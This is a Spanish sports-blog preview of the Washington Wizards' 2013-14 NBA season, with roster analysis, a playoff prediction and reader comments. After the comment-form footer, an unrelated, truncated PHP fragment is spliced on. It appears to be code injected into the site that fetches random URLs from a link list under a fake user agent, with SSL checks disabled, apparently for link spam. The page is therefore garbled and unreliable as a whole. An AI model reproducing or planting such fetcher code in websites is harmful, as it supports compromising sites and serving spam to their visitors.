Washington Wizards: La rebelión en el Este

25 de October de 2013 por Sancho88
La Conferencia Este será un hervidero esta temporada entre los equipos aspirantes a ocupar las últimas plazas de los Playoffs. Mientras que los cinco primeros puestos parecen asignados de carrerilla a Heat, Bulls, Nets, Pacers y Knicks, por las tres últimas plazas para entrar en postemporada habrá una auténtica pelea en el barro. A priori, equipos como los Raptors, los Pistons y los propios Wizards deberían ocupar los puestos del 6º al 8º, pero Cavaliers, Magic, Hawks, y en menor medida Bobcats, también estarán al acecho en un año que se presenta aciago para los tres equipos ‘tankeadores’ por excelencia esta temporada: Celtics, Sixers y Bucks. Equipos que otros años han peleado por la segunda ronda de los Playoffs pero que esta temporada se retirarán a descansar para dejar paso a la savia nueva de la Conferencia Este.

Los Wizards están en todas las quinielas para convertirse en una de las revelaciones de la temporada. No obstante, pelear por entrar en primera ronda parece el techo lógico de este equipo, que por otra parte sigue poniendo los cimientos para ser una franquicia respetada a medio plazo. El tiempo de la lotería ha terminado para ellos y tras un verano marcado por la renovación multimillonaria de John Wall, solo se les puede exigir que demuestren lo máximo en la cancha y que peleen contra los mejores equipos de la liga.

Para ello, como ya comentamos, contarán con su jugador franquicia John Wall, que este año por fin podrá empezar sano desde el principio. El número 1 de su generación tiene aún que demostrar que merece el contrato que ha firmado hasta 2019 por 80 millones de dólares. Este año le exigirán que lleve al equipo a primera ronda de los Playoffs y que alcancen el 50% de victorias en la regular. Conseguir menos que eso sería un fracaso estrepitoso para el jugador formado en la Universidad de Kentucky. Su ‘alter ego’, la figura en la que debería fijarse para conseguir su propósito, es a la fuerza Paul George, compañero de la promoción de 2010 que también cobrará el máximo a partir de la próxima temporada y que consiguió llevar a los Pacers a las finales del Este el año pasado. Ese es el objetivo a medio plazo para Wall. No hay más excusas que trabajar duro y ser un top-5 de los bases de la NBA. En sus zapatillas estará escrita la tarea para este año: ‘Playoffs’, pero el año que viene debería ser aún más ambicioso y grabarse las finales a sangre y fuego. 

Parecería una quimera en estos Wizards verles llegar tan lejos pero lo es menos gracias a que al lado de Wall juega un chico absolutamente mágico que amenaza con recoger el testigo de Kobe Bryant y empezar a marcar una época en la NBA. Hablamos de Bradley Beal. El escolta de segundo año ha realizado una pretemporada maravillosa en la que se ha visto su evolución global en todos los aspectos del juego. Su selección y rango de tiro han mejorado sustancialmente, físicamente es uno de los jugadores más poderosos de la liga en su posición a pesar de su escasa altura y su velocidad deja atrás a cualquier defensa que lo marque. Con estos ingredientes se postula al MIP desde el minuto 1 de la competición y será el principal aliado de John Wall para cumplir el objetivo de alcanzar la primera ronda. Como suplentes de Beal se presentan el escolta novato Glen Rice Jr., hijo del mítico triplista de los Lakers, y que nos ha dejado algunas perlas este verano, y Garrett Temple, que jugará por segundo año en los Wizards tras deambular por 10 equipos desde 2009. Típica historia de un ‘undrafted’ que terminará jugando en algún equipo de Euroliga seguramente.

No obstante, los problemas de lesiones volverán a ser el obstáculo de estos Wizards una vez más en su camino hacia los Playoffs. Si el año pasado hablábamos de las bajas de Wall y Nené, este año son Emeka Okafor y el rookie Otto Porter los damnificados en el ‘frontcourt’ titular del equipo. El pívot de origen nigeriano tiene una hernia discal que le está dando muchos problemas en la movilidad de su cuello, mientras que el alero de Georgetown arrastra una lesión de cadera que no le ha permitido realizar la pretemporada con el equipo. Por si fuera poco, a estas bajas se une la del alero Chris Singleton, con una fractura en el pie izquierdo. Ante estos contratiempos, un año más el entrenador Randy Wittman tendrá que hacer encaje de bolillos y confeccionar un quinteto competitivo desde el principio sin dos de sus teóricos titulares. La baja indefinida de Okafor, que finaliza contrato el próximo verano, abre las puertas de la titularidad a cualquiera que tenga ganas de tirar abajo la puerta para acompañar a Nené Hilario en la pintura. Los principales candidatos son Kevin Seraphin y Jan Vesely. Los dos pívots han tenido veranos muy distintos; mientras el francés ha decidido descansar y no disputar el Eurobasket para prepararse para una gran temporada que le aúpe hacia su primer gran contrato en la liga, el checo ha completado un gran verano siendo el referente de su selección en el torneo continental disputado en Eslovenia. Parece que su madurez ha llegado a las pistas tras dos años decepcionantes y ahora nos mostrará de lo que es capaz realmente este jugador.

Sin embargo, Wittman no lo tiene claro con ninguno de los dos y de momento es Trevor Booker quien está ejerciendo de pareja titular de Nené en la pretemporada. Este hombre no nos da ni frío ni calor, indiferencia absoluta. El brasileño, por su parte, tiene ante sí una temporada para lucirse y volver a saborear las mieles de los Playoffs. Los 39 millones que aún le faltan por cobrar hasta 2016 le convierten de manera automática en la referencia en la pintura y en el acompañante perfecto para Wall y Beal en pos de un futuro brillante. El problema es que Nené lleva mucho tiempo sin ser un jugador determinante y todo lo que prometía en los Nuggets se va diluyendo año tras año y lesión tras lesión. Aquí radican las dudas del equipo para convertirse en un fijo en todas las quinielas de favoritos. Si Nené está bien y responde ofensivamente, el equipo estará bien. Sin él, la zona quedará a expensas de lo que puedan aportar los más jóvenes, y previsiblemente el equipo aspirará a mucho menos.

Por su parte, la baja que ya comentábamos de Porter, reducirá de inicio la amplia rotación de Wittman para el puesto de 3. Trevor Ariza y Martell Webster serán los encargados de hacer tiempo hasta que debute el rookie en el que hay puestas tantas esperanzas. Ariza hizo efectiva su player option por 7 millones y se enfrenta a su último año de contrato, mientras que Webster se ganó una multianual de 22 millones hasta 2017 gracias a su buena actuación el año pasado. Ambos son buenos defensores y jugadores de equipo y su función será abrir la cancha desde las esquinas para tirar de 3 y correr a la contra.

Por último, la posición de base suplente estará en manos de Eric Maynor, que no tuvo la posibilidad de jugar apenas ni en los Thunder ni en los Blazers, y en las alas volverá tras un año prácticamente inédito Al Harrington, un jugador que se adapta de maravilla al estilo de los Wizards y dará minutos de calidad desde el banquillo. También han firmado por el mínimo Josh Childress,  Pops Mensah-Bonsu, Xavier Silas y D’Or Fischer, pero tras completar algunos partidos de pretemporada, los cuatro ya están fuera del equipo.

Resumiendo, los de la capital serán un equipo rápido, defensivo y muy físico, aunque puede que adolezcan de un poco más de cerebro por parte de Wall. A la contra van a funcionar seguro pero en estático les costará un poco más. Cuando lleguen las eliminatorias por el título las opciones de pasar ante monstruos de la talla de los Heat, Pacers, Bulls, Nets o Knicks serán prácticamente inexistentes pero al menos servirá como experiencia para el núcleo joven de la plantilla, que nunca han disfrutado de jugar una postemporada de la NBA. A rebelarse se ha dicho.

Quinteto: John Wall, Bradley Beal, Trevor Ariza, Trevor Booker, Nené Hilario
Sexto hombre: Kevin Seraphin

Altas: Otto Porter Jr. (R – Georgetown Hoyas), Glen Rice Jr. (R – Río Grande Valley Vipers), Al Harrington (Orlando Magic), Eric Maynor (Portland Trail Blazers)
Bajas: Leandro Barbosa (Sin equipo), Jason Collins (Sin equipo), A.J. Price (Minnesota Timberwolves), Cartier Martin (Atlanta Hawks)

Pronóstico: 8º en el Este (41-41). Carne de primera ronda

Comenta

15 comentarios a esta entrada

  1. franitis dice:
    #1

    ¿No son incompatibles un escolta tipo Bryant y un base jugón como Wall? No he seguido mucho a Wizards, pero sobre el papel me chirría una pareja así… hasta que dejen jugar con dos balones…

      Citar

  2. Sancho88 dice:
    #2

    no es el tipico caso de dos chupones ofensivos rollo jennings-ellis. Estos dos defienden a muerte y no son ni la mitad de chupones que cualquiera de esos jugadores individualistas que hay en la liga. Wall era muy individualista en su campaña rookie, pero ha ido ganando en juego de equipo y creo que se va a adaptar muy bien a la progresión de Beal esta temporada. No tiene nada que ver John Wall con un chupón. Y Beal tampoco.

      Citar

  3. txusma dice:
    #3

    “Bradley Beal amenaza con marcar época”? Yo tengo fe en el chaval pero de ahí a comparar con Bryant va un techo. Después de su segunda temporada en la NBA (no después de la 2ª preseason) podremos hablar con mayor conocimientos de causa.

    Por otro lado, los Wizards los veo muy parecidos a los Cavaliers. A los 2 les damos como candidatos a los playoffs pero aparte de un base TOP y alguna otra pieza (Beal en los Wizards, Tristan-Benett en los Cavs) no tienen nada seguro. Dependen exclusivamente de que sus interiores se mantengan sanos y hagan una buena temporada. Yo no me la juego por ellos. Soy más de la regularidad-seguridad de los Hawks, por ejemplo.

      Citar

  4. Sancho88 dice:
    #4

    Bueno, yo les doy playoffs porque creo que tienen el mismo equipo que el año pasado con Wall sano y rondaron el 50%. Si solo jugó Wall así para ganarse el contratazo de los 80 millones, entonces apaga y vámonos, no llegarán a nada, pero yo no creo que Wall sea un jugador del cazo mix, y sí creo que Beal tiene un nivel muy grande como escolta. No sé si para ser como Bryant o Harden, pero desde luego top 5 de escoltas sí puede ser. No sé, puede que el Este siempre sea así, equipos que nos dan ganas de que ganen como Wizards y Cavs y luego no ganan, pero si los Wizards siguen por la senda de los dos últimos meses del año pasado deberían entrar. A ver cuándo vuelven Porter y Okafor, más Ariza, Nené, Seraphin y Vesely serían una rotación de 8 jugadores junto a Wall y Beal muy interesante. Y todos sabemos que la octava plaza del este suele ser un regalo. Todo puede pasar, aunque en todos los pronósticos opinan igual que tú. Yo he sido un poco más optimista con ellos

      Citar

  5. rumbero dice:
    #5

    Sancho88:
    Bueno, yo les doy playoffs porque creo que tienen el mismo equipo que el año pasado con Wall sano y rondaron el 50%. Si solo jugó Wall así para ganarse el contratazo de los 80 millones, entonces apaga y vámonos, no llegarán a nada, pero yo no creo que Wall sea un jugador del cazo mix, y sí creo que Beal tiene un nivel muy grande como escolta. No sé si para ser como Bryant o Harden, pero desde luego top 5 de escoltas sí puede ser. No sé, puede que el Este siempre sea así, equipos que nos dan ganas de que ganen como Wizards y Cavs y luego no ganan, pero si los Wizards siguen por la senda de los dos últimos meses del año pasado deberían entrar. A ver cuándo vuelven Porter y Okafor, más Ariza, Nené, Seraphin y Vesely serían una rotación de 8 jugadores junto a Wall y Beal muy interesante. Y todos sabemos que la octava plaza del este suele ser un regalo. Todo puede pasar, aunque en todos los pronósticos opinan igual que tú. Yo he sido un poco más optimista con ellos

    Coincido bastante con esto. El bloque del año pasado estuvo más que bien a partir de la vuelta de Wall. Nene es un tio que tiene sus historias pero que si no le pasa nada grave no debería perderse más de 15-20 partidos, como tantos otros centers de la liga. Y como dice Sancho al menos tienen esa bateria de internos que no es ninguna maravilla pero que suele cumplir 1 de cada 2 partidos. Me preocupa más el rendimiento de Webster después de firmar ese contrato por ejemplo. Aparte de lo que molan Wall y Beal yo me quedo con la notable mejora defensiva que tuvo el equipo la temporada pasada. De ser de lo peorcito de la liga pasó al Top-10 puntos recibidos y FG% del rival. Eso siempre es una buena base para empezar a montar un equipo sólido. Les doy PO también

      Citar

  6. Denise dice:
    #6

    Creo que los Wizards han conseguido armar un gran equipo, salvo lesiones de gravedad, llegaran a Playoffs con la gorra, y en primera ronda se eliminaran pero dando guerra. No los veo llevandose un rosco.
    Son un equipo bastante profundo con una rotacion util de 10-11 tios, con jugones por fuera y pivots rocosos por dentro.
    La mancha la veo en Ariza, a ver si vuelve a motivarse y se gana los dolares con el sudor de su frente,

      Citar

  7. Jose Luis dice:
    #7

    Ya podeis rehacer el análisis.

    Gortat a los Wizards a cambio de Okafor y un pick de 1ª ronda. Llegan también Malcolm Lee, Shannon Brown y Kendall Marshall, se dice que todos con poco futuro.

    Muchas primeras rondas los suns para un gran draft

      Citar

  8. Cocinitas dice:
    #8

    Pues me parece un gran trade para ambos, aparte de Gortat veo jugadores aprovechables. No deberian tener problemas para ser 8º del Este.

      Citar

  9. Denise dice:
    #9

    Buen trade para ambos.
    Los Wizards consiguen un gran center sin problemas fisicos a su espalda, y unos jugadores de segunda unidad bastante aprovechables que daran aun mas profundidad al equipo. Con semejante plantilla, a los Wizards hay que exigirle Playoffs sí o sí, todo lo que no sea jugar la post-temporada para mi sería un fracaso y habría que cortar cabezas en el verano,

    Por los Suns, le dejan espacio a Len para su progreso (aunque pienso que será un paquete), y de camino hacen mas tanking aun. Okafor no pinta nada en el roster pero es un buen expiring.
    Y la ronda que pillan no está mal, será un top 15-18 mas o menos.

      Citar

  10. franitis dice:
    #10

    Posible clasificación conferencia Este:

    – Heat
    – Bulls
    – Pacers
    – Nets
    – Pistons
    – Knicks
    – Cavs
    – Wizards

    ¿Qué opináis?

      Citar

  11. Simon dice:
    #11

    Excelente traspaso para ambos equipos.
    Wizards consigue dos buenas piezas para subir su estatus en la conferencia Este. Ahora mismo de garantías ahí dentro solo tenían a Nené pues la vueta de Okafor era una incógnita y no iban a luchar por los PO en el Oeste si el acompañante principal de Nene eran Seraphin o Booker…
    Además Gortat es un pivot a muy buen precio y que es Expiring por lo que si no funcionara el año que viene se marcha sin más. Además con él llegan un buen suplente para el puesto de escolta como es Shannon Brown y un par de jóvenes que a la hora de la verdad van a contar poco, si no son cortados antes.

    Wizards ahora tiene a Gortat que es más fiable que Okafor por la tendencia a lesionarse de este, pierden una primera ronda importantísima pero que en el peor de los casos estarán perdiendo un pick 13 al ser protegida pick 12… que si, que es un buen draft y en el 13 se pueden encontrar buenísimos jugadores pero en realidad un pick 13 no es garantía de nada.

      Citar

  12. Ruxixón dice:
    #12

    Agree! gran traspaso de Wizards cubriéndose ante la baja de Okafor,para empezar la temporada iban justos,ahora muy bien,luchando desde el primer día.

      Citar

  13. Esteban dice:
    #13

    Simon: de jóvenes que a la hora de la verdad van a contar poco, si no son cortados antes.

    comparto
    hay que tener muy presente lo bien que ha rendido y puede rendir brown como sexto hombre, lo hizo en los lakers y en los suns

    los wizards saldrian de inicio con wall-beal-ariza-nene-gortat y tendrian un banco con marshall, brown, webter, porter, vasely y seraphin, mucha vairedad

    me gusta y mucho, los veo enPO

    otto portet es un paquete o solo parece?

      Citar

  14. Melo15 dice:
    #14

    Marshall, Brown cortados por los Wizards

      Citar

  15. Simon dice:
    #15

    No entiendo la limpia, Brown es un buen jugador que por 3.5 Millones y siendo expiring podría haberles hecho un papelón o en el peor de los casos sacarle alguna segunda ronda o algo a algún equipo que buscara algún suplente competente… o lo que sea pero creo que no tiene mucho sentido cortarlo ahora.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>